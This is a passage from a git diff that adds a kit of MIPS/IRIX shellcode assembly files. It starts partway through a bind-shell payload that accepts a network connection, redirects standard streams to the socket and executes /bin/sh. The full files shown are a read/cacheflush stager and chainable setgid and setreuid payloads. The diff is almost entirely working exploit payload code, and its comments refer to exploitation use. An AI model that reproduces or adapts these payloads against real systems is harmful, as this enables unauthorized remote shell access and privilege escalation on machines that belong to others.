	55	subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
	56	subu a1, sp, a2 /* a1 = (struct sockaddr ) /
	57	li v0, SYS_bind /* 0x0442 */
	58	syscall
	59
	60	/* listen (socket, backlog)
	61	* XXX: is it safe here to make backlog = pointer-on-the-stack ?
	62	* should be, since its still a positive number
	63	*/
	64	/* subu a1, s6, 0x7340 // a1 = backlog = 0x10 */
	65	li v0, SYS_listen /* 0x0448 */
	66	syscall
	67
	68	/* accept (socket, (struct sockaddr *) cl_addr,
	69	* &socklen)
	70	* XXX: a1 is still the pointer to the sockaddr struct
	71	* a2 should be 0x10 still
	72	*/
	73	sw a2, -20(sp)
	74	subu a2, sp, 20 /* a2 = &socklen */
	75	li v0, SYS_accept /* 0x0441 */
	76	syscall
	77
	78
	79	/* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
	80	*/
	81	subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
	82
	83	/* socket returned in v0, save in s7
	84	*/
	85	andi s7, v0, 0xffff
	86
	87	/* dup is emulated through close and fcntl, since irix offers no
	88	* native dup syscall as for example linux. see phrack 56 for details
	89	*/
	90	dup_loop:
	91	andi a0, s3, 0x0103 /* a0 = STD_FILENO /
	92	li v0, SYS_close /* 0x03ee */
	93	syscall
	94
	95	andi a0, s7, 0xffff /* a0 = socket */
	96	slti a1, zero, -1 /* a1 = 0 */
	97	andi a2, s3, 0x0103 /* a2 = STD_FILENO /
	98	li v0, SYS_fcntl /* 0x0426 */
	99	syscall
	100
	101	subu s3, 0x1011
	102	bgez s3, dup_loop
	103
	104	/* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
	105	*/
	106	sw zero, -4(sp)
	107
	108	/* a2 (envp) is already zero due to the dup_loop
	109	*/
	110	gaddr: bltzal zero, gaddr /* rock on-. lsd */
	111	subu a1, sp, 8
	112
	113	/* ra contains the proper address now */
	114	addu ra, ra, 0x0120 /* add 32 + 0x0100 */
	115
	116	add a0, ra, -(8 + 0x100)
	117	sb zero, -(1 + 0x100)(ra) /* store NUL */
	118	sw a0, -8(sp)
	119	li v0, SYS_execve
	120	syscall
	121
	122	.end cbegin
	123	cend:
	124
	125	/* XXX append here: "/bin/sh\x42" */
	126


diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s new file mode 100644 index 0000000..90ab25d --- /dev/null +++ b/other/shellkit/mips_irix/read.s
@@ -0,0 +1,51 @@
	1	/* MIPS/IRIX PIC read/cacheflush code
	2	*
	3	* -sc.
	4	*
	5	* some note:
	6	* since the data that is read in is treated in the data cache, you may
	7	* experience a data/instruction cache incoherence, where the instruction
	8	* cache still contains the old memory contents. to avoid this, send a lot
	9	* of data, first the shellcode and then a huge bogus space of nops, which
	10	* are to flush the data cache, later making the instruction cache populated
	11	* with the real shellcode. or do it as we do it here, use a cacheflush
	12	* syscall. this is only possible if this code is already in icache, so for
	13	* the usual exploitation situation that does not help much.
	14	*/
	15
	16	#include <sgidefs.h>
	17	#include <sys/regdef.h>
	18	#include <sys/asm.h>
	19	#include <sys.s>
	20	#include <sys/syscall.h>
	21
	22	.section .text
	23
	24	.globl cbegin
	25	.globl cend
	26
	27	cbegin:
	28	.set noreorder
	29	.set nomacro
	30
	31	foo: bltzal zero, foo
	32	slti a0, zero, -1
	33
	34	addu ra, ra, (0x0101 + 48)
	35	subu a1, ra, 0x0101
	36
	37	li a2, 0x1010 /* read 0x1010 bytes max */
	38	li v0, SYS_read
	39	syscall
	40
	41	subu a0, ra, 0x0101 /* data was read to here */
	42	li a1, 0x1010 /* should be cacheline aligned */
	43	li t2, -4
	44	not a2, t2 /* BCACHE = 0x03 */
	45	li v0, SYS_cachectl /* 0x047e */
	46	syscall
	47	li t8, 0x7350 /* has to be a sane bds */
	48
	49	.end cbegin
	50	cend:
	51


diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s new file mode 100644 index 0000000..3223892 --- /dev/null +++ b/other/shellkit/mips_irix/setgid.s
@@ -0,0 +1,30 @@
	1	/* MIPS/IRIX PIC setgid chainable code
	2	*
	3	* -sc.
	4	*/
	5
	6	#include <sgidefs.h>
	7	#include <sys/regdef.h>
	8	#include <sys/asm.h>
	9	#include <sys.s>
	10	#include <sys/syscall.h>
	11
	12	.section .text
	13
	14	.globl cbegin
	15	.globl cend
	16
	17	cbegin:
	18	.set noreorder
	19	.set nomacro
	20
	21	/* setgid (a0) */
	22	li a0, 0x4141 /* gid ^ 0x5555 */
	23	xor a0, a0, 0x5555
	24	li v0, SYS_setgid /* 0x0416 */
	25	syscall
	26	li t8, 0x7350
	27
	28	.end cbegin
	29	cend:
	30


diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s new file mode 100644 index 0000000..9578262 --- /dev/null +++ b/other/shellkit/mips_irix/setreuid.s
@@ -0,0 +1,32 @@
	1	/* MIPS/IRIX PIC setreuid chainable code
	2	*
	3	* -sc.
	4	*/
	5
	6	#include <sgidefs.h>
	7	#include <sys/regdef.h>
	8	#include <sys/asm.h>
	9	#include <sys.s>
	10	#include <sys/syscall.h>
	11
	12	.section .text
	13
	14	.globl cbegin
	15	.globl cend
	16
	17	cbegin:
	18	.set noreorder
	19	.set nomacro
	20
	21	/* setreuid (a0, a1) */
	22	li a0, 0x4141 /* ruid ^ 0x5555 */
	23	li a1, 0x4242 /* euid ^ 0x5555 */
	24	xor a0, a0, 0x5555
	25	xor a1, a1, 0x5555
	26	li v0, SYS_setreuid /* 0x0464 */
	27	syscall
	28	li t8, 0x7350
	29
	30	.end cbegin
	31	cend:
	32